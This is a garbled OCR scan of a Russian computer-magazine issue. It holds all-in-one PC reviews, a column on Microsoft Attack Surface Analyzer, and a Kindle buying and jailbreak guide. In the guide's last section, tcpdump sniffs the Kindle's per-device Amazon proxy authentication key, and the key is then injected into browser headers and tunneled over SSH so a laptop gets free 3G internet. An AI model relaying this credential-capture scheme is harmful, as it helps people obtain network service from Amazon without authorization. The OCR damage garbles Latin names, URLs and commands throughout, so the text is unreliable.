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Тор ЕТ2010А6 



Ьепоѵо 
ИеаСепІге А700 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ДИСПЛЕЙ: 23", 1920x1 080 
ПРОЦЕССОР: Іпіеі Соге ІЗ-350М, 2.26 ГГц 
ЧИПСЕТ: Іпіеі НМ55 

ВИДЕОАДАПТЕР: АТІ МоЬіІііу Рабеоп НО 5470 512 Мб 
ОПЕРАТИВНАЯ ПАМЯТЬ: 2 Гб ООРЗ, 2х 500ІММ 
ЖЕСТКИЙ ДИСК: 5АТА 500 Гб (7200 об/мин) 

ОПТИЧЕСКИЙ ПРИВОД: слотовый ОѴБ ВирегМиШ 

СЕТЕВЫЕ ИНТЕРФЕЙСЫ: 1 0/1 00/1 000 ОідаЬИ: ЕШегпеІ ЕАІЧ, ѴѴі-Бі 

802.11 Ь/д/п, ЕІІиеШоШ 2.1 БОК 

ДОПОЛНИТЕЛЬНО: кардридер 6-в- 1 , аудиовход 

ПОРТЫ: 6х 115В 2.0, БЮМІ, 5/РБІГ 

ГАБАРИТЫ: 568x430x71 мм 

ВЕС: 14.8 кг 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ДИСПЛЕЙ: сенсорный 20", 1600x900 
ПРОЦЕССОР: АМБ АіЫоп 11X2 250и, 1 .6 ГГц 
ЧИПСЕТ:АМБ РХ780 

ВИДЕОАДАПТЕР: АТІ Бабеоп НБ 5470, 512 Мб выделенной памяти 

ОПЕРАТИВНАЯ ПАМЯТЬ: 4 Гб ББРЗ, 2х 50БІММ 
ЖЕСТКИЙ ДИСК: ВАТА 500 Гб (7200 об/мин) 

ОПТИЧЕСКИЙ ПРИВОД: ОѴБ ВирегМиШ 

СЕТЕВЫЕ ИНТЕРФЕЙСЫ: 1 0/1 00/1 000 ОідаЬИ: ЕШегпеі ЕАІМ, ѴѴі-Рі 
802.11 Ь/д/п 

ДОПОЛНИТЕЛЬНО: кард-ридер 2-в- 1 , аудиовход 
ПОРТЫ: 6х БІ5В 2.0, НРМІ.Б/РОІР 
ГАБАРИТЫ: 497x374x48 мм 

ВЕС: 4.75 кг 



□ 



□ □ 



+ 

Любители хорошей акустики наверняка заинтересуются этой моделью, 
оснащенной аудиосистемой Л В Б. Крометого, девайс может похвастаться 
приятной внешностью — черный корпус с плавными линиями смотрится 
стильно. Внутри скрыты процессор Іпіеі Соге ІЗ и видеоплата АТІ МоЬіШу 
Вабеоп НБ 5470, которые обеспечивают производительность, достаточ- 
ную для игр на средних настройках, что подтвердили и результаты наших 
тестов. Клавиатура и мышь работают через Е>Ше1:ооШ,такчто их можно 
будет подключить клюбому ПКс этим интерфейсом. Клавиатура, кстати, 
компактная и удобная, а также имеется специальная полоса для ее под- 
светки (правда, яркость не регулируется). В отличие от многих других 
участников теста, у моноблока Бепоѵо удобно располагается микрофон и 
шум системы охлаждения никак не влияет на его работу. 

Несмотря на неплохую начинку, производительность системы оказалась 
ниже среднего. Дисплей не сенсорный. У щелевого оптического привода 
отсутствует возможность работы с мини-СО. 



+ 

Компания АВБІВ продолжает выпускустройств популярной у пользова- 
телей линейки БЕЕ. Стильный и компактный девайс отличается самым 
маленьким (менее 5 кг) весом в нашем тесте. Построен он на двухъядер- 
ном процессоре АМ Б и оснащен видеоплатой того же производителя, 
имеющей 512 Мб собственной памяти. Наличие всевозможных сетевых 
интерфейсов позволиттебе всегда оставаться на связи. Учитывая малые 
габариты корпуса, компактными выполнены и беспроводные клавиатура 
с мышью, при этом на клаве сохранен блок цифровых клавиш (правда, 
расположены они не совсем стандартно). 




Корпус негабаритен во многом за счеттого, что блок питания у него 
внешний. Не только вес, но и дисплей устройства также самый малень- 
кий у нас втесте. Отнюдь невысокой оказалась и производительность 
системы. Крометого, нас не порадовала встроенная акустика, а также 
неудобное расположение микрофона рядом с выходом системы охлаж- 
дения. 
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РЕВВІІМ 



РЕЗУЛЬТАТЫ 

ТЕСТОВ 



оЗОМагк Ѵапіаде 

ЗопуѴАІОѴРСИЗМІК 

Ьепоѵо ШеаСепІге А700 
НР ТоисІіЗтагІ 600 - 1220ги 
АЗІІ5 ЕЕЕ Тор ЕТ2010А61В 
Асег Азріге А23751 
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Из-за сбоев у модели Бопу тест не завершен 



о РСМагк Ѵапіаде 

ЗопуѴАІОѴРСИЗМІК 
Ьепоѵо ІсІеаСепІге А700 
НР ТоисІіЗтагІ 600 - 1 220ги 
АЗІІЗ ЕЕЕ Тор ЕТ2010А61В 
Асег Азріге А23751 
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Мобильные процессоры Іпіеі сильнее 
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ЗопуѴАІОѴРСИЗМІК 
Ьепоѵо ІсІеаСепІге А700 
НР ТоисІіЗтагІ 600 - 1220ги 
АЗІІЗ ЕЕЕ Тор ЕТ2010А61В 
Асег Азріге А23751 
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ЗопуѴАІОѴРСИЗМІК 
ІепоѵоМеаСеп(геА700 
НР ТоисІіЗтагІ 600 - 1 220ги 
АЗІІЗ ЕЕЕ Тор ЕТ2010А61В 
Асег Азріге А23751 
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Устройства Асег и Бопу в лидерах 



Процессор от АМР подвел моноблок А51І5 



оѴѴіпКАК 

ЗопуѴАІОѴРСИЗМІК 
Іепоѵо ІсІеаСепІге А700 
НР ТоисІіЗтагІ 600 - 1 220ги 
АЗІІЗ ЕЕЕ Тор ЕТ2010А61В 
Асег Азріге А23751 

Моноблок Асег впереди всех 




О 7-2ІР 

ЗопуѴАІОѴРСИЗМІК 
Ьепоѵо ІсІеаСепІге А700 
НР ТоисІіЗтагІ 600 - 1220ги 
АЗІІЗ ЕЕЕ Тор ЕТ2010А6 1В 
Асег Азріге А23751 

И опять победа за Асег 




Заключение 

Мы провели достаточно много времени, тестируя эти устройства, 
поэтому можем смело делать выводы. Все устройства оказались 
весьма интересными. Награду «Выбор редакции» получает НР 



ТоисЬВтагІ: 600-1 220 ги, показавший отличную производительность 
и функциональность. Несколько менее мощный, нотакже очень при- 
ятный моноблок Асег Азріге А23751 награждается титулом «Лучшая 
покупка». Нельзя не отметить и Ар р Іе іМас — красавчика с очень 
высокой иеной, т 
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■ ■ Степан «Зіер» Ильин ЦѵѵШег.сот/зІераЬ) 




Колонка редактора 

Анализатор поверхности атаки 



Вечная тема — безопасность ѴѴіпсІоѵѵз. 
Любая критическая ошибка дорого обхо- 
дится Місгозоіі. Иногда баг превращает- 
ся в катастрофу. Достаточно вспомнить 
2003 год, когда в результате эпидемии 
«Бластера» было заражено более 1 500 
000 компьютеров по всему миру. Это не 
просто колоссальный урон по и без того 
непростой репутации компании, но еще 
и колоссальные расходы. Представь, 
сколько стоило обработать одни только 
звонки в службу поддержки (а их было 
более трех миллионов) от обезумевших 
пользователей, компьютеры которых 
стали не переставая перегружаться. Но 
на какие бы ухищрения ни шли раз- 
работчики (вроде таких четко формали- 
зованных методологий по разработке 
безопасного кода как ЗОБ), какие бы 
защитные механизмы ни придумывали 
(взять хотя бы БЕР и А5І_Р), все равно 
найдется какая-нибудь Обау-уязвимость, 
позволяющая заразить систему несмо- 
тря ни на что. Ребятам должно быть 
особенно обидно за то, что уязвимость 
может быть вовсе не в самой винде или, 
скажем, Іпіегпеі Ехріогег. А когда ты 
не можешь контролировать появление 
заразы в системе, единственный выход 

— обнаружить и нейтрализовать ее. К 
счастью, в Місгозоіі это поняли. Не так 
давно вышла вторая версия бесплатного 
антивируса Зесигііу Еззепііаіз, который 
весьма неплох, по меньшей мере не 
хуже других бесплатных продуктов. А 

в январе была представлена еще одна 
утилита для обеспечения безопасности 

— Місгозоіі Аііаск Зигіасе Апаіугег. 
Анализатор поверхности атаки — звучит 
круто, да? Под серьезным названием 
скрывается довольно любопытная про- 
грамма, которая для меня уже оказа- 
лась очень полезной на практике. Но 
это не массовый продукт и никогда им 
не будет. Если верить описанию, прога 
представляет собой инструмент, кото- 
рый использовался в Місгозоіі, а теперь 
доступен публично для людей, связан- 
ных с информационной безопасностью. 
Назначение утилиты простое — узнать 
все об изменениях, которые происходят 
в системе после установки какого-либо 
приложения. Принцип работы более чем 
прозаичен. Создаются два снимка систе- 



мы (до и после установки вызывающего 
подозрения приложения), после чего 
выявляются произошедшие изменения: 
появившиеся файлы, новые ключи в 
реестре и так далее. Но есть фишка, 
которая отличает программу от многих 
аналогичных: я говорю о специальных 
триггерах, которые реагируют на неко- 
торые потенциально опасные события. 
Если какие-то изменения сразу вызыва- 
ют подозрения, их описания обязательно 
будут в отчете для аналитика. 

Проверить систему в действии я решил 
на только что появившемся решении 
боодіе Сіоиб Соппесі, предназначенном 
для интеграции онлайн-сервисов боодіе 
в офисный пакет Місгозоіі ѴѴогб. Для 
синхронизации документов с облаком 
в систему устанавливается специаль- 
ный клиент. Мои вопросы: что и где он 
прописывает в системе, и насколько 
это безопасно? Итак, запускаем Аііаск 
Зигіасе Апаіугег и выполняем первичное 
(так называемое Ьазеііпе) сканирование. 
Программа показывает процесс созда- 
ния снимка, подробно отображая вну- 
шительный список элементов системы, 
которые фиксируются (это файлы, ключи 
реестра, сетевые шары, различные 
хэндлы, запущенные процессы и сер- 
висы, элементы автозагрузки и многое 
другое). Через пару минут мы получаем 
саб-архив, в котором собранные дан- 
ные разбиты на отдельные ХМБ-файлы 
(беру на заметку, это может пригодиться 
в будущем для создания собственного 
анализатора). Теперь устанавливаем в 
систему нашего подопытного кролика, 
то есть клиентскую часть Сіоиб Соппесі. 
После чего запускаем повторное (так 
называемое ргосіисі) сканирование в 
Аііаск Зигіасе Апаіугег, чтобы получить 
снимок системыьпосле установки прило- 
жения. В результате на руках мы имеем 
два Бпарзбоі’а — осталось их сравнить, 
выбрав в анализаторе пункт «Оепегаіе 
аііаск зигіасе герогі». 

Самая ценная часть отчета — это опи- 
сание того, что изменилось в системе. 
Аііаск Зигіасе Апаіугег выдает весьма 
разноплановый отчет. Вот, что получи- 
лось для Ѳоодіе Сіоиб Соппесі: 

• Ыеѵѵ Зегѵісе (боодіе Іірбаіе Зегѵісе); 

• Ыеѵѵ Риппіпд Ргосеззез (доодіе сгазб 



бапсііег апб а .ЫЕТ Ігатеѵѵогк иіііііу); 

• 113 Ыеѵѵ Редізіегесі СОМ Сопігоіз; 

• 3 Ыеѵѵ Іпіегпеі Ехріогег Зііепі Еіеѵаііоп 
Епігіез / РгеарргоѵесІ сопігоіз (боодіе 
Іірсіаіе ріидіп); 

• 1 ЫеѵѵТСР Рогі ( Езіа ЫізЬесІ оиіЬоипб 
ТСР рогі оп 49336); 

• 6 Ыеѵѵ ЫаппесІ Рірез. 

Согласись, это уже не просто список 
новых файлов и ключей в реестре, 
как это бывает в случае многих других 
подобных утилит. Отчет (который, кстати, 
оформляется в виде Ыппі-файла) более 
чем полезен для анализа изменений, 
которые произошли в системе. Но слова 
«поверхность атаки» были бы лишними 

в названии, если бы программа не пыта- 
лась определить потенциальную угрозу 
тех изменений, которые были внесены 
в систему. В случае с СІоисІ Соппесі они 
тоже есть: 

• появление директорий со «слабыми» 
ограничениями в доступе; 

• наличие процессов, для которых 
отключена система БЕР; 

• работа сервисов, над которыми потен- 
циально возможно захватить контроль. 

Я привожу лишь краткое описание, хотя 
в отчете фигурирует полное описание 
проблемы с указанием конкретных 
директорий, прав доступа, имен пользо- 
вателей, которые могут взять под кон- 
троль выполнение сервиса и так далее. 
Да, это необязательно реальные векторы 
атаки, но они вполне могут ими оказать- 
ся. И такой анализ очень радует, іг 
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ПРИРУЧИТЬ 

кюи 



Как дешево купить и круто проапгрейдить 
электронную читалку 6т Аткоп 

© На рынке сейчас доступно огромное количество электронных 
читалок. На любой вкус и цвет, любых размеров и с разными 
технологиями экрана. Но лишь некоторые можно назвать по- 
настоящему хакерскими. Одним из наиболее «гиковых» ридеров 
является Атамп КіпсІІе. С помощью этого девайса не только можно 
читать книги, но и, к примеру, админить по ЗЗН серваки или 
использовать бесплатный инет по всему миру. 



В процессе выбора электронной читалки для меня все всегда было 
очевидно. В магазинах сейчас немало дешевых моделей, которые 
радуют своей доступностью, но при более детальном рассмотрении 
огорчают скудным функционалом и невысоким качеством. После 
непродолжительного изучения темы я для себя сделал практически 
однозначный вывод: если хочется купить по-настоящему достой- 
ный девайс, потратив минимальное количество денег, то лучше 
всего заказать читалку из Штатов. Варианта два: КіпсІІе от Атагоп 
и ІМоок от Вагпез & ІЧоЫе. Оба девайса хороши: один с ОѴѴЕРТѴ- 
клавиатурой и Ыпих’ом на борту, второй - с дополнительным сенсор- 
ным экраном и платформой АпбгоісІ. Думаю, не надо рассказывать, 
что это дает. Но самое главное — это очень-очень хорошие читалки. 
И по очень хорошей цене. Атагоп и Вагпез & ІМоЫе могут позволить 
себе такой демпинг, поскольку зарабатывают намного больше на 
продаже контента, то есть электронных книжек. Чем больше элек- 
тронных читалок они продадут, тем больше книжек будет куплено в 
их электронных магазинах. Статистика Атагоп за прошлый год гово- 
рит о многом: в 2010 году было продано 1 15 КіпсІІе- книг на каждые 
100 книг в мягком переплете и в три раза больше КіпсІІе-книг, чем 
книг в твердом переплете. Отсюда и цена: Атагоп КіпсІІе с модулем 
ѴѴі-Рі стоит всего $139. Повторяю еще раз: $139. Да, сюда надо при- 
бавить стоимость доставки в Россию, но цена все равно получается 
на уровне самых дешевых читалок, которые доступны в продаже 
в наших магазинах. Но будь уверен: ставшая легендарной модель 
КіпсІІе (которая, к слову, выходит уже в третьем поколении) и какая- 
нибудь дешевка из магазина рядом с метро — абсолютно несрав- 
нимы. Именно поэтому я хочу рассказать тебе о том, как заказать 
Атагоп КіпсІІе сюда, в Россию, и использовать такие возможности 
ридера, которые другим читалкам и не снились. 



Как купить? 

Как известно, приобрести что-то в западном интернет-магазине 
ничуть не сложнее, чем и в российском (а зачастую даже проще). В 
случае доставки из США, главное — оформлять доставку через ІІ5Р8 
(это аналог нашей «Почты России») и помнить о предельном пороге 
в €1000, посылки стоимостью ниже которого не облагаются тамо- 
женными пошлинами. Покупки оплачиваются любой пластиковой 
картой международных платежных систем Ѵіза или МазІегСагсІ. Если 
ты еще не успел обзавестись таковой, рекомендую бегом отправ- 
ляться в банк (обслуживание «пластика» стоит всего 600 рублей в 
год). Альтернативный вариант — приобрести виртуальную карту Ѵіза, 
специально предназначенную для осуществления онлайн-покупок. 
Последнее, в частности, возможно через многочисленные автоматы 
Оіѵѵі. Но все было бы совсем просто, если бы можно было зайти на 
Атагоп.сот . выбрать там КіпсІІе и оформить заказ. Увы, здесь тебя 
будет ждать облом в виде следующего сообщения: «КіпсІІе ѴѴігеІезз 
Реабіпд Оеѵісе, ѴѴі-ЕІ, 6" Оізріау, Огарбііе — і-аіезі Ѳепегабоп саппоі 
Ье збірресі Іо Ібе зеіесіесі асісігезз». Этот товар по какой-то причине 
не высылают на российские адреса! Это обидно, но решаемо. Обойти 
подобное ограничение не так уж и сложно, если обзавестись вир- 
туальным почтовым адресом в США на свое имя. Подобную услугу 
предоставляют специальные посреднические компании. Они получают 
посылку на твое имя и виртуальный адрес, который сами тебе выдают, 
а далее отправляют в любую точку мира. Подобных контор довольно 
много, но наиболее проверенными являются тіуиз.сот и ;ЫріІо. 

зпп . Цена обработки одной посылки составляет $8.50. Подробнее об 
этом я рассказывал в одной из своих колонок ( хакер.ги/тадагіпе/ 
ха/1 29/040/1 .азр ). Ты можешь спросить: во сколько КіпсІІе обходится в 
итоге? Отвечаю: что-то около $180 ($139 за сам девайс, $0 за доставку 
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Покупаем читалку на сайте Атагоп 



Киндл собственной персоной 



Как узнать больше о 
своем КіпсІІе? 



Специальные команды могут быть вызваны из экра- 
на ЗеШпдз: 

• Изменить 36-провайдера: набрать 311 (АСГ+ЕОО); 

• серийный номер Киндла и тому подобное: набрать 
411 (АІ_Т+КСЮ); 

• информация по 30-модему: набрать 61 1 (АІ_Т+ѴС!СІ); 

• информация по ѴѴіРі-модему: набрать 71 1 
(АИ+ІІСЮ). 



Полезные хаки для 
читалки 



Не вижу смысла подробно описывать установку раз- 
личных хаков: в большинстве своем она повторяет 
инсталляцию джейлбрейка. Но не могу не упомянуть 
несколько особенно интересных доработок, которые 
могут быть тебе интересны. 

• Ввод кириллических символов, который недосту- 
пен по умолчанию: 

Ьіі.іу/суг гут ; 

• полная русификация девайса: 

Ьіі.іѵ/гиз кіпсііе ; 

• читалка іЬ2-файлов: 

ЬІІ.ІѵЛЬ2 кіпсііе ; 

• альтернативная прошивка от китайских друзей, 
которые сделали более удобным чтение РйР и реа- 
лизовали поддержку книжек в ОЗѴІІ: 

ууікі.тоЬіІегеаб.сот/ѵѵікі/Риокап Кіпсііе ; 

• дополнительные словари: 

Ьіі.іу/зіоѵагі кіпсііе . 




НТТР://ѴШѴѴ 
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> Ііпкз 

• Самый большой 
русскоязычный 
форум по Кіпсііе: 
Ібе-еЬоок.огд/ 
іогитА/іеуѵіогипп. 
рЬ р?б=37 : 

• настоящая Мекка 
для владельцев риде- 
ра отАтагоп: 
тоЬіІегеаб.сот/ 
ІогитзЛогитбізрІаѵ. 
рИр?~Г= 1 40 . 




Незадолго до сдачи 
статьи в печать вышла 
новая прошивка для 
Кіпсііе. В программ- 
ном обновлении (вер- 
сия 3.1] появилась 
поддержка реальных 
номеров страниц 
— такихже, как и на 
бумажном носителе. 
Но это работает только 
для части книг, до- 
ступных для покупки 
через Атагоп. 



до посредника, $8.5 за его услуги, и около $30 за доставку в РФ), то 
есть чуть больше 5000 рублей за версию с ѴѴі-Рі. Цена может варьи- 
роваться в зависимости от места назначения и способа доставки. 

Чем быстрее ты хочешь стать обладателем читалки, тем дороже это 
обойдется. Так или иначе, заказать Кіпсііе в США — задача более чем 
решаемая. 

Как использовать? 

Может возникнуть подозрение, что Аппагоп как-то ограничивает сво- 
боду использования читалки и позволяет читать лишь приобретен- 
ные в его магазине книги. В действительности никаких ограничений 
нет. При подключении устройство распознается как внешний нако- 
питель, и ты можешь забросить на читалку любые книги и докумен- 
ты. Есть, правда, нюанс. Многие пользователи в России привыкли к 
тому, что книги распространяются в довольно удачных форматах ІЬ2 
и ериЬ. Увы, Кіпсііе эти форматы по умолчанию, то есть без установки 
дополнительных хаков, не поддерживает. К счастью, любой документ 
можно легко преобразовать в такой формат, который Кіпсііе поддер- 
живает. Я использую два варианта. 

1. Специальный сервис для конвертирования и последующей загруз- 
ки книг в читалки, которые предлагается самой компанией Атагоп. 



Смысл в следующем. Для каждого отдельного Кіпсііе выделяется уни- 
кальный е-таіі формата іізегйігее. кіпсііе. сот. Если отправить на этот 
адрес письмо с прикрепленным документом и словом «сопѵегі» в теме 
сообщения, то автоматический сервис сам приведет файл в нужный 
вид, а Кіпсііе заберет его во время следующей синхронизации (для 
этого в меню нужно выбрать пункт «Супе & сбеск іог ііетз»). Учти, что 
в настройках своего аккаунта Атагоп необходимо прописать те адре- 
са, с которых возможно принимать подобного рода сообщения. 

2 . Другой способ — переконвертировать книгу с помощью специ- 
альной программы или онлайн-сервиса, после чего забросить ее по 
кабелю через 115В. Одним из самых удачных решений здесь является 
программа СаІіЬге. Она бесплатна, функциональна и работает под 
разными ОС. При этом, опять же, позволяет сразу забросить документ 
через изегйігее. кіпсііе. сот. 

Отложенное чтение 

Помимо непосредственно книжек я часто читаю новости и свежие 
статьи с популярных ресурсов. В этом большая заслуга небезыз- 
вестного сервиса Іпзіарарег ( іпзіарарег.сот ). который реализует 
подход «Прочитаю позже». Это очень удобная штука. Если ты 
видишь в Сети интересную статью, но прочитать ее сразу нет воз- 
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Сервис ЗЫрНо доставит посылку на любой адрес в мире 



Сеть покрытия бесплатного мобильного инета КіпсІІе 



можности, то удобно с помощью специального букмаркета на пане- 
ли браузера (кнопка «РеасІ Іаіег») сохранить ее в базу Іпзіарарег. 
Причем важно, что прочитать страницу можно не только через 
веб-морду сервиса, но и через различные мобильные устройства, 
в том числе — КіпсІІе. Іпзіарарег позволяет преобразовать статьи 
в КіпсІІе-совместимый формат и легко передать на девайс через 
изЬ-шнурок. Можно также настроить беспроводную доставку кон- 
тента, но в этом случае не забудь использовать адрес домена йітее. 
кіпсИе.сот (а не йктсНе.сот), чтобы доставка была бесплатной. 
Іпзіарарег позволяет отправлять по двадцать статей за один раз, 
а также назначить периодичность доставки. Вдвойне приятно, что 
сервис хорошо работает в связке с боодіе Реабег’ом. Благодаря 
этому стало как никогда удобно отложить несколько интересных, 
но длинных статей для онлайн-чтения, например, в метро. Не могу 
здесь не упомянуть об еще одной разработке, предлагающей ана- 
логичный функционал — это сервис кіпсІІе.ІоріхоК.сот . 

Делаем іаіІЬгеак 

Еще недавно мы и знать не знали, что такое джейлбрейк. А теперь вот 
дошло до того, что выполняем эту операцию даже для электронной 
читалки. В общем случае необходимости взламывать читалку нет. 
Джейлбрейк нужен только, если ты хочешь внести изменения в ее 
работу. Сделать своего рода «тюнинг» читалки, реализовав, к примеру, 
возможность чтения новых форматов или использования 30-модема 
читалки для доступа в Сеть через ноутбук. Атагоп продало огромное 
количество КіпсІІе, и целая армия фанатов сейчас лепит один полез- 
ный хак за другим. 

Для выполнения джейлбрейка необходимо выполнить несколько про- 
стых шагов: 

1. Последняя версия патча всегда доступна в специальной ветке на 
известном форуме, посвященном электронным читалкам ( тс 
сот/Ію гитз/зЬоѵѵ1:ЬгеасІ.рЬр?1=88004 ). Необходимо скачать при- 
аттаченный файл кіпсИе^аіІЬгеак-О.б.Ы. и распаковать его. Внутри 
ты найдешь множество .Ьіп-файлов, а также папку зге. Каждый файл 
представляет собой модификацию джейлбрейка для определенной 
версии КіпсІІе, тебе нужно выбрать из них подходящий. 

Имя файла имеет следующий формат ирба1:е_*_іп5І:аІІ.Ьіп. Символы 
к2 вместо звездочки означают версию К2 118, к2і — К2 6 ѴѴ, бх — КйХ 
118, бхі - КйХ ѲѴѴ, бхд -КйХ ѲгарЫіе, кЗд - КЗ 30 (115 [В006]), кЗѵѵ - 
КЗ ѴѴіРІ [В008] и кЗдЬ -КЗ 30 (ІІК [ВООА]). 

В квадратных скобках указаны первые четыре символа серийника 
девайса. Так как мой КіпсІІе самой последней версии и привезен из 
Штатов, то я выбрал файл и рсіаіе кЗд_і П5і:а И. Ь і п . 

2. Далее закидываем его в корень КіпсІІе, после чего в меню девайса 
выбираем «Ноте -> Мепи -> Зейіпдз -> Мепи -> Іірбаіе Уоиг КіпсІІе». 
Девайс сообщит, что начался процесс обновления программного обе- 
спечения, который довольно быстро успешно завершится. Читалка 
сама переза грузится. 

3. С этого момента КіпсІІе джейлбрейкнут и готов к самым смелым экс- 
периментам в лице разнообразных хаков. 



Бесплатный 36 

Чтобы продемонстрировать всю мощь дополнительных хаков, 
хочу рассказать тебе о наиболее интересных из них. Но сна- 
чала небольшая прелюдия. Версия КіпсИе с 30 имеет в своем 
описании интересную строчку «Ргее 36 ѴѴогІбѵѵібе». Приобретая 
именно эту версию читалки, я и подумать не мог, что встроенный 
беспроводной модуль (с зашитой намертво 5ІМ-картой) будет 
работать и на территории России. Но он работает! Заметил я это 
совершенно случайно, когда воспользовался встроенным брау- 
зером и осознал, что подключение к своей домашней ѴѴІ-Рі сети 
еще даже не настраивал. Естественно, первая мысль, которая 
приходит на ум — бесплатного сыра не бывает, и оплата за тра- 
фик будет осуществлена постфактум (сколько накачал — столько 
и заплати) с использованием карточки, привязанной кАтагоп- 
аккаунту. Но более детальное исследование дало ответ: сер- 
финг действительно бесплатный! А плата взимается за закачку 
контента с мейла 0 кіпсИе.сот и при загрузке книг из магазина 
(99 центов за Мб в роуминге, что не так уж и много). Другими 
словами, можно серфить через встроенный браузер сколько 
угодно и делать это бесплатно. Главное, чтобы была доступна 
сеть. Тут надо сказать, что скорость соединения у нас в России 
не самая большая, а браузер в КіпсІІе — настоящее наказание. 
Видимо, расчет Атагоп сделан на то, что реально серфить через 
читалку никто не будет. Но! Умельцы еще для второго поколения 
КіпсІІе разработали Іеібегіпд-хак, позволяющий использовать 
читалку как модем! Понимаешь, куда я клоню? Бесплатный инет 
на читалке. Читалка может работать как модем для ноутбука. 
Получаем бесплатный инет на ноутбуке везде, где есть покрытие 
36 (карту можно посмотреть здесь: сИеп1:0 .сеИта рБ.сот/ѵіеѵѵег. 
ЫтІ?соѵ=1 ). 

Настраиваем тетеринг 

Итак, как это сделать? Я все реализовал по инструкции, опубли- 
кованной в одном из англоязычных блогов ( Ьаіадапоѵ.ѵѵогсіргезз. 
сот/201 0/09/25Ае1:Ьегіпд-іЬе-кіпсІІе-3 ). Там есть сложные места, 
поэтому приведу здесь инструкцию полностью: 

1. Нам понадобится специальный хак (набор скриптов, конфигов и 
приложений), который позволяет подключить КіпсІІе к компьютеру не 
как внешний накопитель, а в виде сетевого устройства, которое мы и 
будем использовать для тетеринга. Все, что нужно — изЫЧеіѵѵогк ( о 
[у/изЫЧеілл/огк ). бкачиваем с этой ветки форума архив с последней 
версией хака, ищем файл для нашей версии КіпсІІе’а, переносим его 
в корень устройства и вызываем через меню девайса обновления — 
короче говоря, делаем все точно так же, как и в случае с джейлбрей- 
ком. 

2 . Теперь у нас есть возможность перевести КіпсІІе в режим сетевого 
адаптера. Все команды мы будем вводить в строке поиска, используя 
О ѴѴЕРТУ- клавиатуру. Делается это следующим образом: «Ноте -> 

Беі -> «ДеЬидбп» -> Епіег». Команда включит режим отладки. Далее 
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Раде 1 оі 2 

Включаем хак и$Ь№1ѵѵогк 

запускаем скрипт, активируем хак: « м ~и5Ы\Іе1:\л/огк"->[Еп1:ег]». 

3. Теперь можно подключить девайс к компьютеру. Если все сдела- 
но правильно, система обнаружит новый сетевой адаптер «РІ\ЮІ8/ 
Еібегпеі» и предложит его отконфигурировать. 

Под виндой все немного сложнее, потому что система не сможет найти 
подходящий драйвер. На форумах опытные люди подсказали, что 
подойдут дрова отХегох ( ЫГІу/ВІМРІЗ сігіѵег ). Под ѴѴіпбоѵѵз 7/ѴізІа воз- 
можно придется поставить еще и пакет ѴѴіпбоѵѵз МоЬіІе Оеѵісе Сепіег 

( ЬіТІу/ѵѵппбс боѵѵпіоаб ). 

4 . Пора настроить сетевой интерфейс. Устанавливаем в качестве 
нашего ІР-адреса 192.168.2.1 и маску подсети 255.255.255.0. Теперь 
можно взять РиТТѴ и подключиться к КіпсІІе (его ІР-шник по умолча- 
нию — 192.168.2.2) через Іеіпеі. В окне терминала ты увидишь знако- 
мое консольное окошко — это встроенный в Киндл Пн их. 

5 . Следующий шаг — настройка 55Н-демона. Мы будем использовать 
авторизацию с помощью пары приватного и публичного ключей, 
которые нам поможет создать программа РиТТУдеп (она входит в 
набор стандартного дистрибутива РиТТѴ). Нажимаем в ней кнопку 
«Оепегаіе», двигаем мышкой для генерации случайных значений и 
получаем на экране наш публичный ключ. 

Его содержимое нужно скопировать в текстовый редактор и заки- 
нуть на КіпсІІе в виде файла .аиіЬогІ2есІ_кеу5 в папке «избпеіѵѵогк/ 
еіс». Имей в виду, что если сохранить публичный ключ в файл, вос- 
пользовавшись кнопкой «Заѵе риЫіс кеу», то в него будет добавлено 
несколько ненужных строчек вроде « ВЕѲІ N 88Н2 РІІВиС КЕУ», кото- 
рые не сможет распознать используемый в КіпсИе ЗЗН-демон. 

В завершение сохраняем приватный ключ где-нибудь у себя на компе 
— он нам понадобится в самое ближайшее время. 

6 . С этого момента мы можем получать доступ к файлам через 88Н, 
воспользовавшись утилитой ѴѴіпЗСР. Во время настройки подключе- 
ния необходимо указать «гооі» в качестве имени пользователя и свой 
приватный ключ. Чтобы включить возможность записи, может потребо- 



ваться ввести команду «тпігооі гѵѵ». 

7 . Далее нам понадобится скачать версию снифера Ісрбитр для 
АРМ -архитектуры ( еесз.иппісЬ.еби/~бтига[рАсрбитр-агт ). на 

которой построен КіпсІІе, и залить его на устройство. Зачем нам 
нужен снифер? Дело в том, что все НТТР-запросы, осуществляемые 
с устройства, перенаправляются на прокси-сервер Атагоп. При этом 
в заголовке прописывается специальный ключ-идентификатор (хАзп 
аиіЬепбсаііоп кеу), уникальный для каждой читалки. Соответственно, 
чтобы иметь возможность использовать читалку в качестве модема, 
нам необходимо прописывать этот ключ в заголовок каждого запроса, 
который будет выполнять браузер. 

8 . Запускаем «нюхача» командой «-Дсрсіитр-агт -пАі рррО -зО -ѵѵ 
хбгп.іод» и заходим на любой сайт через киндл. Далее в логе хзбп.іод 
ищем любую запись, начинающуюся с «хДзп:». Это можно сделать в 
консоли так: «саі х^зп.іод I дгер -т 1 хАзп». 

9 . Теперь нужно настроить соответствующим образом браузер. 
Подставить ключ в хедеры позволят дополнительные инструменты, 
например плагин Мосіібу Неабегз ( ЫПу/тосІИл/ Ьеабегз ) для Еігебох. 
Просто указываем в настройках, что любой заголовок должен содер- 
жать значение «хАзп: ключ». 

10 . Все, осталось немного — перенаправить трафик с ноутбу- 
ка на КіпсІІе. Для этого пропишем в Еігеіюх’е прокси-сервер 

1 27.0.0.1 :888 и настроим с этого порта 55Н-туннель до Киндла. 
Открываем РиТТѴ и создаем на порту 888 переадресацию на книж- 
ку: 888:72.21.210.242:80 гооШ 1 92. 1 68.2.2. Здесь 72.21.210.240 - это 
адрес удаленного прокси Атагоп, 192.168.2.2 — внутренний адрес 
КіпсІІе, 888 — выбранный нами произвольный порт. Если во время 
генерации ключа ты использовал парольную фразу, то в этот момент 
КіпсИе запросит ее ввод. 

11 . В завершение можно найти в папке изЬЫеІѵѵогк файл «0І8АВЕЕ0_ 
аиіо» и переименовать его в «аиіо», чтобы скрипты тетеринга запуска- 
лись автоматически. 

К сожалению, 30 на территории нашей страны хорошо работает 
далеко не везде. К тому же некоторые сервисы работать просто отка- 
зываются (в первую очередь те, что используют 88Ц Но ведь работа- 
ет! За месяц использования такой схемы (пускай и не сильно интен- 
сивного) никто с меня ни копейки не снял. Но я вижу своим долгом 
предупредить, что Аппагоп при желании все-таки может попросить 
оплаты за использованный трафик. Хотя повторюсь, что прецедентов 
еще не было. 

Вдохновение 

